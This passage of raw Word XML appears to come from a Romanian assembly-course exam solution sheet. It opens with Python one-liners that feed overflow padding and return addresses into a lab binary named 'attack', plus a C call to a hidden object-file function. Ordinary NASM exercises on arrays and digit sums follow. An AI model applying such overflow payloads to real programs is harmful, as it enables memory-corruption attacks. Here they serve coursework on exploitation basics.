        <w:t>sys.stdout.buffer.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C1728">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C1728">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>b"A</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C1728">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>"*64 + b"\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C1728">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>xEF</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C1728">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C1728">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>xBE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C1728">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C1728">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>xAD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C1728">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C1728">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>xDE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C1728">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>")' | ./attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50629081" w14:textId="77777777" w:rsidR="00033D55" w:rsidRDefault="00033D55" w:rsidP="00033D55">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3624"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">b. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>obtinem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> key2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704E8239" w14:textId="77777777" w:rsidR="00033D55" w:rsidRDefault="00033D55" w:rsidP="00033D55">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3624"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C1728">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">python3 -c 'import sys; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C1728">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>sys.stdout.buffer.write</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C1728">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C1728">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>b"A</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C1728">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>"*72 + b"\x0c\x93\x04\x08")' | ./attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE6AAFD" w14:textId="77777777" w:rsidR="00033D55" w:rsidRDefault="00033D55" w:rsidP="00033D55">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3624"/>
        </w:tabs>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">c. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>scriem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object_attack.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="423A5D23" w14:textId="77777777" w:rsidR="00033D55" w:rsidRPr="006C1728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6C1728">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="72F1B8"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>#include</w:t>
      </w:r>
      <w:r w:rsidRPr="006C172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6C1728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&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C1728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stdio.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C1728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&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5413EE84" w14:textId="77777777" w:rsidR="00033D55" w:rsidRPr="006C1728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6C1728">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Times New Roman" w:hAnsi="Consolas" w:cs="Times New Roman"/>
          <w:color w:val="FE4450"/>
          <w:kern w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>extern</w:t>
      </w:r>
      <w:r w:rsidRPr="006C172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6C172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void</w:t>
      </w:r>
      <w:r w:rsidRPr="006C172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6C172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havidi_cadivi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C172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(</w:t>
      </w:r>
      <w:r w:rsidRPr="006C172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char</w:t>
      </w:r>
      <w:r w:rsidRPr="006C172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6C172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*</w:t>
      </w:r>
      <w:r w:rsidRPr="006C172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14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>param_1</w:t>
      </w:r>
      <w:r w:rsidRPr="006C172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</w:t>
      </w:r>
      <w:r w:rsidRPr="006C172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int</w:t>
      </w:r>
      <w:r w:rsidRPr="006C172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6C172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14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>param_2</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C172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);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="1BB21FE3" w14:textId="77777777" w:rsidR="00033D55" w:rsidRPr="006C1728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6C172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int</w:t>
      </w:r>
      <w:r w:rsidRPr="006C172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6C172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main</w:t>
      </w:r>
      <w:r w:rsidRPr="006C172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() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7E0A74" w14:textId="77777777" w:rsidR="00033D55" w:rsidRPr="006C1728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6C17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    /* call hidden function from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C17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object.o</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C172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with the "key1 key2" argument */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D63C674" w14:textId="77777777" w:rsidR="00033D55" w:rsidRPr="006C1728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6C172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6C1728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havidi_cadivi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C172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(</w:t>
      </w:r>
      <w:r w:rsidRPr="006C1728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"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C1728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specialis</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C1728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 xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C1728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revelio</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C1728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"</w:t>
      </w:r>
      <w:r w:rsidRPr="006C172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6C172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-</w:t>
      </w:r>
      <w:r w:rsidRPr="006C172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0xff24542</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006C172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);</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="07C12078" w14:textId="77777777" w:rsidR="00033D55" w:rsidRPr="006C1728" w:rsidRDefault="00033D55" w:rsidP="00033D5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6C172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6C1728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return</w:t>
      </w:r>
      <w:r w:rsidRPr="006C172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6C1728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  <w:r w:rsidRPr="006C1728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;</w:t>
      </w:r>
      <w:r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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E064708" w14:textId="77777777" w:rsidR="00B46619" w:rsidRDefault="00B46619" w:rsidP="00E73B75">
      <w:pPr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</w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E9EE306" w14:textId="77777777" w:rsidR="00B46619" w:rsidRDefault="00B46619" w:rsidP="00E73B75">
      <w:pPr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</w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2CD58428" w14:textId="77777777" w:rsidR="00B46619" w:rsidRDefault="00B46619" w:rsidP="00E73B75">
      <w:pPr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</w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D13E198" w14:textId="77777777" w:rsidR="00B46619" w:rsidRDefault="00B46619" w:rsidP="00E73B75">
      <w:pPr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</w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D4488E8" w14:textId="163BBED0" w:rsidR="00033D55" w:rsidRDefault="00B46619" w:rsidP="00E73B75">
      <w:pPr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</w:rPr>
        <w:t>VARIANTA CC 2022</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F40CCC" w14:textId="77777777" w:rsidR="00B46619" w:rsidRDefault="00B46619" w:rsidP="00B46619">
      <w:r w:rsidRPr="00865AE9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3543B6B4" wp14:editId="01C4EB50">
            <wp:extent cx="6396383" cy="2475865"/>
            <wp:effectExtent l="0" t="0" r="4445" b="635"/>
            <wp:docPr id="2021051862" name="Imagine 1" descr="O imagine care conține text, scrisoare, captură de ecran, Fon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51862" name="Imagine 1" descr="O imagine care conține text, scrisoare, captură de ecran, Font&#10;&#10;Descriere generată automat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96465" cy="247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9286" w14:textId="77777777" w:rsidR="00B46619" w:rsidRPr="003F4E73" w:rsidRDefault="00B46619" w:rsidP="00B46619">
      <w:pPr>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F4E73">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>SUB 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F510329" w14:textId="77777777" w:rsidR="00B46619" w:rsidRDefault="00B46619" w:rsidP="00B46619">
      <w:r>
        <w:t>a.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F305A1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a: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Aflați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timpul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minim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și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timpul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maxim din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vectorul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lap_times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632B9AC6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Salvați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timpul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minim pe prima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poziție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din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vectorul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results,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iar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timpul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1ADD7AFF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maxim pe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cea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de-a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doua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poziție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3DC443AE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2D654926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movzx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lap_times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;min</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B3EF9A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EFBB4A6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loop_min</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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694E05A4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10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713B4D66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end_loop_min</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0B1546AE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A45482B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movzx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lap_times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5EEE73FC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7CE466A1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jg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schimbare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="614237C1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next</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4461DE53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schimbare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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799AEF9D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47E75597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next</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CB6FEE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next:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6791AA6A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5A43A41C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loop_min</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6FFBACD2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end_loop_min</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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2521EEA6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1CD219C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558F2634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[results],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bx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min</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB96C22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7764CFD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movzx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lap_times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max</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50744A78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loop_max</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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1859BF27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10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="460701AD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end_loop_max</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="15D820C4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F6DCDA8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movzx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lap_times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52776053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48B73621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jl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schimbare_max</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="37A471FF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next_max</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3AB60D97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schimbare_max</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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75343E68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704B12D7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next_max</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0B1EB413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next_max</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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33EEFB05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7220B88B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loop_max</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6C54A281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end_loop_max</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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05EB325E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AF7EB3C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[results +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ax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max</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04082149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Afișare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rezultat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subpunctul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a). Nu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modificați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!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F1A1BF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PRINTF32 `%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hd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%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hd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\n\x0`,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[results],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[results +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3ED6E704" w14:textId="77777777" w:rsidR="00B46619" w:rsidRDefault="00B46619" w:rsidP="00B466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</w:p>
    <w:p w14:paraId="55695AFF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b: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Aflați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câtul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și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restul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împărțirii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sumei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timpilor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din prima</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D4BA9C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jumătate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antrenament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la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suma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timpilor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din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cea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de-a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doua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jumătate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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D07C193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antrenament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7D99E224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Salvați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câtul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împărțirii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pe prima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poziție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din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vectorul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results,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iar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restul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="138572B2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împărțirii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pe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cea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de-a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doua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poziție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018DD4A2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392306A5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suma1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC2BFD6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sum_first_half</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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3D463628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5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="499865F6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end_sum_first_half</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="768C6881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3920A6A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bx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lap_times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14A62734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53AAD30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7712E639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sum_first_half</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2B17061B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end_sum_first_half</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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2D51F4C7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5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C284E42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suma2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714F1D41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3223A4E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sum_second_half</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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53238732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10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1506603C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end_sum_second_half</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="30A6AAD3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4F43001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si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lap_times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26E2578E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445971C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0CC2F3AD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sum_second_half</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2E0AF9E8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end_sum_second_half</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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76220CC0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135008EE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00734A96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div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620111D7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[results],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ax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cat</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E164B88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[results +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dx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rest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185C9153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Afișare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rezultat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subpunctul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b). Nu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modificați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!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323FECBA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PRINTF32 `%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hd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%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hd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\n\x0`,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[results],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[results +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596971A9" w14:textId="77777777" w:rsidR="00B46619" w:rsidRDefault="00B46619" w:rsidP="00B466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</w:p>
    <w:p w14:paraId="3D3A5548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c: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Aflați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diferențele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dintre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timpi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,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doi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câte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doi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01E692C9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Plasați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rezultatele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în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vectorul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results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0599E484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7BE057F8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dif_terms_loop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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689BC8E2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10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B766423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end_dif_terms_loop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="47EC6AFB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3D0F7F9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movzx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lap_times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12C5EEAA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movzx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lap_times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4E61B61D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sub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a[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] - a[i+1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159465E2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9153F6D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[results +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bx</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2F3EDF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</w:p>
    <w:p w14:paraId="128BB7AC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1511FFFA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dif_terms_loop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6E95E007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end_dif_terms_loop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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06C04DF4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A7B4237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Afișare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rezultat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subpunctul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c). Nu </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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modificați</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00865AE9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!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A7F0C8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results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CCCFFF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c_results_len</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4A542AF9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A017B49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print_c_loop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00865AE9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45E3576A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PRINTF32 `%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hd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\x0`,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word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3D9D6AAE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865AE9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</w:p>
    <w:p w14:paraId="5B1261A3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865AE9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loop</w:t>
      </w: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print_c_loop</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6B388E8B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3C14CA6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865AE9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PRINTF32 `\n\x0`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A67AB5" w14:textId="77777777" w:rsidR="00B46619" w:rsidRPr="00865AE9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2BE5C13" w14:textId="77777777" w:rsidR="00B46619" w:rsidRDefault="00B46619" w:rsidP="00B46619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3BDF3B71" w14:textId="77777777" w:rsidR="00B46619" w:rsidRDefault="00B46619" w:rsidP="00B46619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7DF81F29" w14:textId="77777777" w:rsidR="00B46619" w:rsidRDefault="00B46619" w:rsidP="00B46619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3F4E73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>SUB 2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D0622E" w14:textId="77777777" w:rsidR="00B46619" w:rsidRDefault="00B46619" w:rsidP="00B46619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3F4E73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A842052" wp14:editId="39D8D5D7">
            <wp:extent cx="5943600" cy="2352040"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="620739480" name="Imagine 1" descr="O imagine care conține text, scrisoare, Font, captură de ecran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39480" name="Imagine 1" descr="O imagine care conține text, scrisoare, Font, captură de ecran&#10;&#10;Descriere generată automat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42F8" w14:textId="77777777" w:rsidR="00B46619" w:rsidRPr="003F4E73" w:rsidRDefault="00B46619" w:rsidP="00B46619">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003F4E73">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>a.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383D1024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a: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Implementati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`void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print_array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(int *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arr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, int n) care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afiseaza</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="19A10C39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elementele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numere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intregi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ale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vectorului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arr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` de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dimensiune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n.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525EA3B3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Toate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elementele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vor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fi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afisate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pe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aceeasi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linie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separate de un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spatiu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13BADE53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La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finalul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afisarii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se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va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insera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NEWLINE.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Vezi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sectiunea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.data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02EFD6E5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printf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`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poate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modifica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registrele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EAX, ECX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EDX.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4613C045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EC3EFEE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print_array</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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3DD87EA3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357F12C0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66FF19ED" w14:textId="77777777" w:rsidR="00B46619" w:rsidRPr="003F4E73" w:rsidRDefault="00B46619" w:rsidP="00B46619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392928E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090D3C4A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5BCE892B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1D712FDC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A45BA5B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arr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="000AE7B7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12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n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6802DD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A42B8A5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4CB269AF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loop_print</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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738D2CF2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0A023FF8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end_loop_print</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="135CD0E8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AC71684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72B7B5AB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CC15ABC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70C28A47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723FB788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1170D26C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0453002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694F8E19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int_fmt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2C0B38F7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45951414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03300D86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5838161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01074CD2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101AD1F5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6FF56A49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4FB6666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2B941A44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loop_print</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6BC079EB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end_loop_print</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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521216B2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1AFD7AEA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09612B18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6FBEE127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8D0802B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NEWLINE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D1B3C8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24EAE868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</w:p>
    <w:p w14:paraId="62E2B512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E4964D5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50AE0B6E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3FF962D0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5D5095F6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795D462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4A01A185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3B9E5724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4481C22A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4102A70A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1DCF060C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A27C4EA" w14:textId="77777777" w:rsidR="00B46619" w:rsidRDefault="00B46619" w:rsidP="00B466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</w:p>
    <w:p w14:paraId="52BA1495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;TODO b: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Implementati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`int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sum_digits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(n)` care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intoarce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suma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cifrelor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numarului</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="47B46E39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intreg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fara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semn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`n`.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF54F3B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e.g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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30ED7210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      -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sum_digits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(123456) = 1+2+3+4+5+6 = 21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203D8B62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      -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sum_digits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(100) = 1+0+0 = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7418F196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sum_digits</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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7BF8F02A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18227206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7C7CFFE8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2725C2B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5846C53F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2E09E3BF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4C72D267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BFEA636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233B5BEE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suma</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="37428C1C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loop_sum_digits</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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0F05CF10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6CE557D3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end_loop_sum_digits</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="356730A4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2C1C823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6F27C845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643AEBEF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10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437A2D2E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div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41241321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FFEB587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catul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0986BC09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restul</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="10E85D65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3D53A10A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loop_sum_digits</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4C55E30F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end_loop_sum_digits</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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15F49BE8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640DC482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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F389606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38E06C7A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14AE4762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7CF543E1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83A014D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1450DCD6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7D34CCDD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DA4334B" w14:textId="77777777" w:rsidR="00B46619" w:rsidRDefault="00B46619" w:rsidP="00B466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</w:p>
    <w:p w14:paraId="4F50AB92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c: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Implementati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`void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sum_digits_arr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(int *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arr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, int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len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, int *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out_arr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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D2EC75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care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actualizeaza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fiecare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element din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vectorul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out_arr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` cu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suma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cifrelor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elementului</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0AC63E57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corespunzator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din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vectorul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arr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` de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dimensiunea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len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`.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7252506A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out_arr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[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] =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sum_digits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(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arr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[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])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE3F748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ATENTIE la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registrii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pe care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sum_digits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` ii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modifica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769259E6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sum_digits_arr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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678FB71A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0F7045AD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612DC088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3401492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3C6205D9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17872363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3665405E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56320DA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26F028B5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12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6656759A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16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1DEA8A96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9D356B6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4BB26320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loop_sum_digits_arr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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1591A8C1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1003BDB2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end_loop_sum_digits_arr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7A91175F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B3AA32E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0392E55F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5760FD4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0D4A1933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6EB5838E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484CA1C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354A60D3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sum_digits</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="01715187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</w:p>
    <w:p w14:paraId="73515778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29595FA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0FA74EBF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2084AE56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D20CE85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0E9F7D6A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79B0EB9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32908010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loop_sum_digits_arr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6C8DA9C5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end_loop_sum_digits_arr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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11B6E11B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FE68A13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3A4BB665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05A12313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11CB5657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40BBF131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0520B760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32797CB" w14:textId="77777777" w:rsidR="00B46619" w:rsidRDefault="00B46619" w:rsidP="00B466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</w:t>
      </w:r>
    </w:p>
